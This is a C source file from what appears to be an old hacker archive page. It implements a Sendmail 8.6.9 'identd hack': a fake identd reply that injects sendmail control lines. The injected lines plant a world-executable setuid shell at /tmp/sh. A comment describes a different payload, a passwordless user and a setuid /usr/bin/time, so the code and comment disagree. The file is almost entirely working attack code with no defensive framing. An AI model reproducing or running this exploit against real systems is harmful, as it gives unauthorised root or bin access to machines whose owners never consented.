home *** CD-ROM | disk | FTP | other *** search
- /* Sendmail 8.6.9 identd hack. */
-
- #include <stdio.h>
- #include <sys/types.h>
- #include <sys/fcntl.h>
- #include <sys/time.h>
- #include <stdlib.h>
- #include <string.h>
- #include <unistd.h>
-
- #define OUTPUT_BUFFER 2048 /* Output and input, */
- #define SOCKET_BUFFER 100 /* with which we must up-put */
-
- /* The commands to send... This particular string tells the machine
- to create a user named funkzor, with a null password, uid of 999,
- and gid of 100. It then instructs the machine to change /usr/bin/time
- to mode 6777, which makes it setuid. Once you login to the machine
- (as funkzor) just type /usr/bin/time sh, and you will have a bin-owned
- shell. (perhaps root... if you're lucky)
- */
- #define EVIL_COMMAND "root\r\nCroot\r\nMprog, P=/bin/sh, F=lsDFMeu, A=sh -c $u\r\n<\"|/bin/cp /bin/sh /tmp/sh ; chmod 7777 /tmp/sh\">\r\n$rascii"
-
-
- void main()
- {
- struct fd_set fdesc; /* File descriptor structure */
- char outbuf[OUTPUT_BUFFER]; /* Our output buffer */
- char inbuf[SOCKET_BUFFER]; /* "" input "" */
-
- /* Preparing to read incoming data, captain. */
- FD_ZERO(&fdesc);
- FD_SET(0, &fdesc);
-
- /* Read it, Sulu! Now! */
- if(read(0, inbuf, SOCKET_BUFFER - 1)<=0)
- exit(1);
- FD_SET(0, &fdesc);
-
- /* to remove the /r/n at the end of inbuf */
- if(inbuf[strlen(inbuf)-2]==13 || inbuf[strlen(inbuf)-2]==10)
- inbuf[strlen(inbuf)-2]=0;
- else
- inbuf[strlen(inbuf)-1]=0;
-
- /* Now we send our instructions, under the guise of innocent
- * ol' identd. I find this ironic, that identd, supposedly
- * a standard that would help stop "evil hacker types", became
- * part of one of the bigger holes to ever hit the net. Hmm.
- * Ain't life funny that way sometimes? :)
- */
-
- sprintf(outbuf, "%s : USERID : UNIX : %s\r\n", inbuf, EVIL_COMMAND);
- write(1, outbuf, strlen(outbuf));
- exit(0);
- }
-
-
